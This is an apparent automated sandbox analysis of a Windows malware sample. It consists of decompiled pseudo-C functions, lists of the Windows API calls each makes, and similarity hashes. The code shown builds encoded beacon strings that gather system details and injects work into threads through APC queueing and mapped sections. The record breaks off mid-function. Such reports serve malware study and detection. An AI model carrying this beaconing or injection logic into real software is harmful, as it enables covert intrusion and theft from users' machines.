                                                                                                                                                                                                                                          0x004010f2
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x004010f3
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 004010E7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.600128406.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600165940.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.600183229.0000000000407000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: SectionView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1323581903-0
                                                                                                                                                                                                                                          • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                          • Instruction ID: 10958ca1104106c1f1914508b01f5b68205e6ea8213fc9395d66977e5d822f6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F012B590020CBFDB119FA5CC85C9FBBBDEB44394B10893AB152E14A0D6319E489A60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                                                          			E01121754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                          				void* _v28;
                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				long _t60;
                                                                                                                                                                                                                                          				intOrPtr _t61;
                                                                                                                                                                                                                                          				intOrPtr _t62;
                                                                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                                                                          				intOrPtr _t64;
                                                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                                                          				void* _t68;
                                                                                                                                                                                                                                          				intOrPtr _t69;
                                                                                                                                                                                                                                          				int _t72;
                                                                                                                                                                                                                                          				void* _t73;
                                                                                                                                                                                                                                          				void* _t74;
                                                                                                                                                                                                                                          				void* _t76;
                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                          				intOrPtr _t87;
                                                                                                                                                                                                                                          				intOrPtr* _t89;
                                                                                                                                                                                                                                          				intOrPtr _t95;
                                                                                                                                                                                                                                          				void* _t97;
                                                                                                                                                                                                                                          				intOrPtr _t104;
                                                                                                                                                                                                                                          				signed int _t108;
                                                                                                                                                                                                                                          				char** _t110;
                                                                                                                                                                                                                                          				int _t113;
                                                                                                                                                                                                                                          				signed int _t115;
                                                                                                                                                                                                                                          				intOrPtr* _t116;
                                                                                                                                                                                                                                          				intOrPtr* _t118;
                                                                                                                                                                                                                                          				intOrPtr* _t120;
                                                                                                                                                                                                                                          				intOrPtr* _t122;
                                                                                                                                                                                                                                          				intOrPtr _t125;
                                                                                                                                                                                                                                          				intOrPtr _t130;
                                                                                                                                                                                                                                          				int _t134;
                                                                                                                                                                                                                                          				CHAR* _t136;
                                                                                                                                                                                                                                          				intOrPtr _t137;
                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                          				void* _t147;
                                                                                                                                                                                                                                          				int _t148;
                                                                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                                                                          				intOrPtr _t150;
                                                                                                                                                                                                                                          				void* _t152;
                                                                                                                                                                                                                                          				long _t156;
                                                                                                                                                                                                                                          				intOrPtr* _t157;
                                                                                                                                                                                                                                          				intOrPtr* _t158;
                                                                                                                                                                                                                                          				intOrPtr* _t161;
                                                                                                                                                                                                                                          				void* _t162;
                                                                                                                                                                                                                                          				void* _t164;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t147 = __edx;
                                                                                                                                                                                                                                          				_t138 = __ecx;
                                                                                                                                                                                                                                          				_t60 = __eax;
                                                                                                                                                                                                                                          				_v12 = 8;
                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                          					_t60 = GetTickCount();
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t61 =  *0x112d018; // 0xc9f186aa
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t62 =  *0x112d014; // 0x3a87c8cd
                                                                                                                                                                                                                                          				_t136 = _a16;
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t63 =  *0x112d010; // 0xd8d2f808
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t64 =  *0x112d00c; // 0x8f8f86c2
                                                                                                                                                                                                                                          				asm("bswap eax");
                                                                                                                                                                                                                                          				_t65 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t3 = _t65 + 0x112e633; // 0x74666f73
                                                                                                                                                                                                                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x112d02c,  *0x112d004, _t60);
                                                                                                                                                                                                                                          				_t68 = E011257AB();
                                                                                                                                                                                                                                          				_t69 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t4 = _t69 + 0x112e673; // 0x74707526
                                                                                                                                                                                                                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                                                                                                                                                                                                                          				_t164 = _t162 + 0x38;
                                                                                                                                                                                                                                          				_t149 = _t148 + _t72; // executed
                                                                                                                                                                                                                                          				_t73 = E011273E9(_t138); // executed
                                                                                                                                                                                                                                          				_t137 = __imp__;
                                                                                                                                                                                                                                          				_v8 = _t73;
                                                                                                                                                                                                                                          				if(_t73 != 0) {
                                                                                                                                                                                                                                          					_t130 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t7 = _t130 + 0x112e8cb; // 0x736e6426
                                                                                                                                                                                                                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                                                                                                                                                                                                                          					_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                          					_t149 = _t149 + _t134;
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _v8);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t74 = E0112614A();
                                                                                                                                                                                                                                          				_v8 = _t74;
                                                                                                                                                                                                                                          				if(_t74 != 0) {
                                                                                                                                                                                                                                          					_t125 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_t11 = _t125 + 0x112e8d3; // 0x6f687726
                                                                                                                                                                                                                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                                                                                                                                                                                                                          					_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _v8);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t150 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          				_t76 = E0112757B(0x112d00a, _t150 + 4);
                                                                                                                                                                                                                                          				_t156 = 0;
                                                                                                                                                                                                                                          				_v20 = _t76;
                                                                                                                                                                                                                                          				if(_t76 == 0) {
                                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                                          					RtlFreeHeap( *0x112d238, _t156, _a16); // executed
                                                                                                                                                                                                                                          					return _v12;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t79 = RtlAllocateHeap( *0x112d238, 0, 0x800);
                                                                                                                                                                                                                                          					_v8 = _t79;
                                                                                                                                                                                                                                          					if(_t79 == 0) {
                                                                                                                                                                                                                                          						L25:
                                                                                                                                                                                                                                          						HeapFree( *0x112d238, _t156, _v20);
                                                                                                                                                                                                                                          						goto L26;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					E0112749F(GetTickCount());
                                                                                                                                                                                                                                          					_t83 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          					__imp__(_t83 + 0x40);
                                                                                                                                                                                                                                          					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                          					_t87 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          					__imp__(_t87 + 0x40);
                                                                                                                                                                                                                                          					_t89 =  *0x112d324; // 0x56495b0
                                                                                                                                                                                                                                          					_t152 = E01124D2C(1, _t147, _a16,  *_t89);
                                                                                                                                                                                                                                          					_v28 = _t152;
                                                                                                                                                                                                                                          					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                          					if(_t152 == 0) {
                                                                                                                                                                                                                                          						L24:
                                                                                                                                                                                                                                          						RtlFreeHeap( *0x112d238, _t156, _v8); // executed
                                                                                                                                                                                                                                          						goto L25;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					StrTrimA(_t152, 0x112c294);
                                                                                                                                                                                                                                          					_t95 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          					_push(_t152);
                                                                                                                                                                                                                                          					_t18 = _t95 + 0x112e252; // 0x616d692f
                                                                                                                                                                                                                                          					_t97 = E01129DEF(_t18);
                                                                                                                                                                                                                                          					_v16 = _t97;
                                                                                                                                                                                                                                          					if(_t97 == 0) {
                                                                                                                                                                                                                                          						L23:
                                                                                                                                                                                                                                          						RtlFreeHeap( *0x112d238, _t156, _t152); // executed
                                                                                                                                                                                                                                          						goto L24;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t157 = __imp__;
                                                                                                                                                                                                                                          					 *_t157(_t152, _a4);
                                                                                                                                                                                                                                          					 *_t157(_v8, _v20);
                                                                                                                                                                                                                                          					_t158 = __imp__;
                                                                                                                                                                                                                                          					 *_t158(_v8, _v16);
                                                                                                                                                                                                                                          					 *_t158(_v8, _t152);
                                                                                                                                                                                                                                          					_t104 = E0112A5E9(0, _v8);
                                                                                                                                                                                                                                          					_a4 = _t104;
                                                                                                                                                                                                                                          					if(_t104 == 0) {
                                                                                                                                                                                                                                          						_v12 = 8;
                                                                                                                                                                                                                                          						L21:
                                                                                                                                                                                                                                          						E01126106();
                                                                                                                                                                                                                                          						L22:
                                                                                                                                                                                                                                          						HeapFree( *0x112d238, 0, _v16);
                                                                                                                                                                                                                                          						_t156 = 0;
                                                                                                                                                                                                                                          						goto L23;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t108 = E01122F2A(_t137, 0xffffffffffffffff, _t152,  &_v24); // executed
                                                                                                                                                                                                                                          					_v12 = _t108;
                                                                                                                                                                                                                                          					if(_t108 == 0) {
                                                                                                                                                                                                                                          						_t161 = _v24;
                                                                                                                                                                                                                                          						_t115 = E0112A060(_t161, _a4, _a8, _a12); // executed
                                                                                                                                                                                                                                          						_v12 = _t115;
                                                                                                                                                                                                                                          						_t116 =  *((intOrPtr*)(_t161 + 8));
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t116 + 0x80))(_t116);
                                                                                                                                                                                                                                          						_t118 =  *((intOrPtr*)(_t161 + 8));
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                                                                                                                          						_t120 =  *((intOrPtr*)(_t161 + 4));
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t120 + 8))(_t120);
                                                                                                                                                                                                                                          						_t122 =  *_t161;
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t122 + 8))(_t122);
                                                                                                                                                                                                                                          						E0112147E(_t161);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                                                          						if(_v12 == 0) {
                                                                                                                                                                                                                                          							_t110 = _a8;
                                                                                                                                                                                                                                          							if(_t110 != 0) {
                                                                                                                                                                                                                                          								_t153 =  *_t110;
                                                                                                                                                                                                                                          								_t159 =  *_a12;
                                                                                                                                                                                                                                          								wcstombs( *_t110,  *_t110,  *_a12);
                                                                                                                                                                                                                                          								_t113 = E01121600(_t153, _t153, _t159 >> 1);
                                                                                                                                                                                                                                          								_t152 = _v28;
                                                                                                                                                                                                                                          								 *_a12 = _t113;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L19;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						if(_a8 != 0) {
                                                                                                                                                                                                                                          							L19:
                                                                                                                                                                                                                                          							E0112147E(_a4);
                                                                                                                                                                                                                                          							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                          								goto L22;
                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                          								goto L21;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          			}























































                                                                                                                                                                                                                                          0x01121754
                                                                                                                                                                                                                                          0x01121754
                                                                                                                                                                                                                                          0x01121754
                                                                                                                                                                                                                                          0x0112175d
                                                                                                                                                                                                                                          0x01121766
                                                                                                                                                                                                                                          0x01121768
                                                                                                                                                                                                                                          0x01121768
                                                                                                                                                                                                                                          0x01121775
                                                                                                                                                                                                                                          0x01121780
                                                                                                                                                                                                                                          0x01121783
                                                                                                                                                                                                                                          0x01121788
                                                                                                                                                                                                                                          0x01121791
                                                                                                                                                                                                                                          0x01121794
                                                                                                                                                                                                                                          0x01121799
                                                                                                                                                                                                                                          0x0112179c
                                                                                                                                                                                                                                          0x011217a1
                                                                                                                                                                                                                                          0x011217a4
                                                                                                                                                                                                                                          0x011217b0
                                                                                                                                                                                                                                          0x011217bd
                                                                                                                                                                                                                                          0x011217bf
                                                                                                                                                                                                                                          0x011217c5
                                                                                                                                                                                                                                          0x011217ca
                                                                                                                                                                                                                                          0x011217d5
                                                                                                                                                                                                                                          0x011217d7
                                                                                                                                                                                                                                          0x011217da
                                                                                                                                                                                                                                          0x011217dc
                                                                                                                                                                                                                                          0x011217e1
                                                                                                                                                                                                                                          0x011217e7
                                                                                                                                                                                                                                          0x011217ec
                                                                                                                                                                                                                                          0x011217ef
                                                                                                                                                                                                                                          0x011217f4
                                                                                                                                                                                                                                          0x01121801
                                                                                                                                                                                                                                          0x01121803
                                                                                                                                                                                                                                          0x01121809
                                                                                                                                                                                                                                          0x01121813
                                                                                                                                                                                                                                          0x01121813
                                                                                                                                                                                                                                          0x01121815
                                                                                                                                                                                                                                          0x0112181a
                                                                                                                                                                                                                                          0x0112181f
                                                                                                                                                                                                                                          0x01121822
                                                                                                                                                                                                                                          0x01121827
                                                                                                                                                                                                                                          0x01121834
                                                                                                                                                                                                                                          0x01121836
                                                                                                                                                                                                                                          0x01121844
                                                                                                                                                                                                                                          0x01121844
                                                                                                                                                                                                                                          0x01121846
                                                                                                                                                                                                                                          0x01121854
                                                                                                                                                                                                                                          0x01121859
                                                                                                                                                                                                                                          0x0112185b
                                                                                                                                                                                                                                          0x01121860
                                                                                                                                                                                                                                          0x01121a2f
                                                                                                                                                                                                                                          0x01121a39
                                                                                                                                                                                                                                          0x01121a42
                                                                                                                                                                                                                                          0x01121866
                                                                                                                                                                                                                                          0x01121872
                                                                                                                                                                                                                                          0x01121878
                                                                                                                                                                                                                                          0x0112187d
                                                                                                                                                                                                                                          0x01121a23
                                                                                                                                                                                                                                          0x01121a2d
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01121a2d
                                                                                                                                                                                                                                          0x01121889
                                                                                                                                                                                                                                          0x0112188e
                                                                                                                                                                                                                                          0x01121897
                                                                                                                                                                                                                                          0x011218a8
                                                                                                                                                                                                                                          0x011218ac
                                                                                                                                                                                                                                          0x011218b5
                                                                                                                                                                                                                                          0x011218bb
                                                                                                                                                                                                                                          0x011218ca
                                                                                                                                                                                                                                          0x011218d1
                                                                                                                                                                                                                                          0x011218da
                                                                                                                                                                                                                                          0x011218e0
                                                                                                                                                                                                                                          0x01121a17
                                                                                                                                                                                                                                          0x01121a21
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01121a21
                                                                                                                                                                                                                                          0x011218ec
                                                                                                                                                                                                                                          0x011218f2
                                                                                                                                                                                                                                          0x011218f7
                                                                                                                                                                                                                                          0x011218f8
                                                                                                                                                                                                                                          0x011218ff
                                                                                                                                                                                                                                          0x01121904
                                                                                                                                                                                                                                          0x01121909
                                                                                                                                                                                                                                          0x01121a0d
                                                                                                                                                                                                                                          0x01121a15
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01121a15
                                                                                                                                                                                                                                          0x01121912
                                                                                                                                                                                                                                          0x01121919
                                                                                                                                                                                                                                          0x01121921
                                                                                                                                                                                                                                          0x01121926
                                                                                                                                                                                                                                          0x0112192f
                                                                                                                                                                                                                                          0x01121935
                                                                                                                                                                                                                                          0x0112193c
                                                                                                                                                                                                                                          0x01121941
                                                                                                                                                                                                                                          0x01121946
                                                                                                                                                                                                                                          0x01121a45
                                                                                                                                                                                                                                          0x011219f9
                                                                                                                                                                                                                                          0x011219f9
                                                                                                                                                                                                                                          0x011219fe
                                                                                                                                                                                                                                          0x01121a09
                                                                                                                                                                                                                                          0x01121a0b
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01121a0b
                                                                                                                                                                                                                                          0x01121950
                                                                                                                                                                                                                                          0x01121955
                                                                                                                                                                                                                                          0x0112195a
                                                                                                                                                                                                                                          0x0112195f
                                                                                                                                                                                                                                          0x0112196a
                                                                                                                                                                                                                                          0x0112196f
                                                                                                                                                                                                                                          0x01121972
                                                                                                                                                                                                                                          0x01121978
                                                                                                                                                                                                                                          0x0112197e
                                                                                                                                                                                                                                          0x01121984
                                                                                                                                                                                                                                          0x01121987
                                                                                                                                                                                                                                          0x0112198d
                                                                                                                                                                                                                                          0x01121990
                                                                                                                                                                                                                                          0x01121995
                                                                                                                                                                                                                                          0x01121999
                                                                                                                                                                                                                                          0x01121999
                                                                                                                                                                                                                                          0x011219a5
                                                                                                                                                                                                                                          0x011219b1
                                                                                                                                                                                                                                          0x011219b5
                                                                                                                                                                                                                                          0x011219b7
                                                                                                                                                                                                                                          0x011219bc
                                                                                                                                                                                                                                          0x011219be
                                                                                                                                                                                                                                          0x011219c3
                                                                                                                                                                                                                                          0x011219c8
                                                                                                                                                                                                                                          0x011219d5
                                                                                                                                                                                                                                          0x011219dd
                                                                                                                                                                                                                                          0x011219e0
                                                                                                                                                                                                                                          0x011219e0
                                                                                                                                                                                                                                          0x011219bc
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011219a7
                                                                                                                                                                                                                                          0x011219ab
                                                                                                                                                                                                                                          0x011219e2
                                                                                                                                                                                                                                          0x011219e5
                                                                                                                                                                                                                                          0x011219ee
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011219ee
                                                                                                                                                                                                                                          0x011219ad
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011219ad
                                                                                                                                                                                                                                          0x011219a5

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 01121768
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 011217B8
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 011217D5
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 01121801
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01121813
                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 01121834
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01121844
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01121872
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 01121883
                                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(05649570), ref: 01121897
                                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(05649570), ref: 011218B5
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,011252FE,?,056495B0), ref: 01124D57
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: lstrlen.KERNEL32(?,?,?,011252FE,?,056495B0), ref: 01124D5F
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: strcpy.NTDLL ref: 01124D76
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: lstrcat.KERNEL32(00000000,?), ref: 01124D81
                                                                                                                                                                                                                                            • Part of subcall function 01124D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,011252FE,?,056495B0), ref: 01124D9E
                                                                                                                                                                                                                                          • StrTrimA.SHLWAPI(00000000,0112C294,?,056495B0), ref: 011218EC
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrlen.KERNEL32(?,00000000,00000000,01125335,616D692F,00000000), ref: 01129DFB
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrlen.KERNEL32(?), ref: 01129E03
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrcpy.KERNEL32(00000000,?), ref: 01129E1A
                                                                                                                                                                                                                                            • Part of subcall function 01129DEF: lstrcat.KERNEL32(00000000,?), ref: 01129E25
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000000,?), ref: 01121919
                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 01121921
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 0112192F
                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 01121935
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: lstrlen.KERNEL32(?,00000000,0112D330,00000001,0112937A,0112D00C,0112D00C,00000000,00000005,00000000,00000000,?,?,?,0112207E,?), ref: 0112A5F2
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: mbstowcs.NTDLL ref: 0112A619
                                                                                                                                                                                                                                            • Part of subcall function 0112A5E9: memset.NTDLL ref: 0112A62B
                                                                                                                                                                                                                                          • wcstombs.NTDLL ref: 011219C8
                                                                                                                                                                                                                                            • Part of subcall function 0112A060: SysAllocString.OLEAUT32(?), ref: 0112A09B
                                                                                                                                                                                                                                            • Part of subcall function 0112A060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 0112A11E
                                                                                                                                                                                                                                            • Part of subcall function 0112147E: HeapFree.KERNEL32(00000000,00000000,01121D11,00000000,?,?,-00000008), ref: 0112148A
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01121A09
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,616D692F,00000000), ref: 01121A15
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?,056495B0), ref: 01121A21
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01121A2D
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 01121A39
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 603507560-0
                                                                                                                                                                                                                                          • Opcode ID: 9d3cbdef155f8a6fdc7e65cf7dfaae55a700b04de1e000044c2add67e1022328
                                                                                                                                                                                                                                          • Instruction ID: 3b3e5422b5933d6e68344d89f34f15c910d0294d392e3540f97c3d9f01d652aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d3cbdef155f8a6fdc7e65cf7dfaae55a700b04de1e000044c2add67e1022328
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57915A71A00219BFDF29DFA8EC88A9E7BB9EF09354F144024F918D7264DB35D9A1CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                                                                          			E004011D4(void* __ecx, void* __edx, void* __edi, long _a4) {
                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                          				long _t21;
                                                                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                          				long _t29;
                                                                                                                                                                                                                                          				long _t30;
                                                                                                                                                                                                                                          				long _t34;
                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                                                          				void* _t52;
                                                                                                                                                                                                                                          				signed int _t55;
                                                                                                                                                                                                                                          				void* _t57;
                                                                                                                                                                                                                                          				intOrPtr* _t58;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t47 = __ecx;
                                                                                                                                                                                                                                          				_t21 = E0040179C();
                                                                                                                                                                                                                                          				_v8 = _t21;
                                                                                                                                                                                                                                          				if(_t21 != 0) {
                                                                                                                                                                                                                                          					return _t21;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                          					_t55 = SwitchToThread() + 8;
                                                                                                                                                                                                                                          					_t23 = E00401B6F(__edi, _t55); // executed
                                                                                                                                                                                                                                          					_v8 = _t23;
                                                                                                                                                                                                                                          					Sleep(0x20 + _t55 * 4); // executed
                                                                                                                                                                                                                                          					_t25 = _v8;
                                                                                                                                                                                                                                          				} while (_t25 == 0xc);
                                                                                                                                                                                                                                          				if(_t25 != 0) {
                                                                                                                                                                                                                                          					L21:
                                                                                                                                                                                                                                          					return _t25;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                                                          					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0x404140, 0, 0); // executed
                                                                                                                                                                                                                                          					_t57 = _t26;
                                                                                                                                                                                                                                          					if(_t57 == 0) {
                                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                                          						_v8 = GetLastError();
                                                                                                                                                                                                                                          						L19:
                                                                                                                                                                                                                                          						_t25 = _v8;
                                                                                                                                                                                                                                          						if(_t25 == 0xffffffff) {
                                                                                                                                                                                                                                          							_t25 = GetLastError();
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						goto L21;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t29 = QueueUserAPC(E004016E4, _t57,  &_v32); // executed
                                                                                                                                                                                                                                          					if(_t29 == 0) {
                                                                                                                                                                                                                                          						_t34 = GetLastError();
                                                                                                                                                                                                                                          						_a4 = _t34;
                                                                                                                                                                                                                                          						TerminateThread(_t57, _t34);
                                                                                                                                                                                                                                          						CloseHandle(_t57);
                                                                                                                                                                                                                                          						_t57 = 0;
                                                                                                                                                                                                                                          						SetLastError(_a4);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					if(_t57 == 0) {
                                                                                                                                                                                                                                          						goto L18;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t30 = WaitForSingleObject(_t57, 0xffffffff);
                                                                                                                                                                                                                                          						_v8 = _t30;
                                                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                                                          							GetExitCodeThread(_t57,  &_v8);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						CloseHandle(_t57);
                                                                                                                                                                                                                                          						goto L19;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(E0040130B(_t47,  &_a4) != 0) {
                                                                                                                                                                                                                                          					 *0x404138 = 0;
                                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t58 = __imp__GetLongPathNameW;
                                                                                                                                                                                                                                          				_t39 =  *_t58(_a4, 0, 0); // executed
                                                                                                                                                                                                                                          				_t52 = _t39;
                                                                                                                                                                                                                                          				if(_t52 == 0) {
                                                                                                                                                                                                                                          					L9:
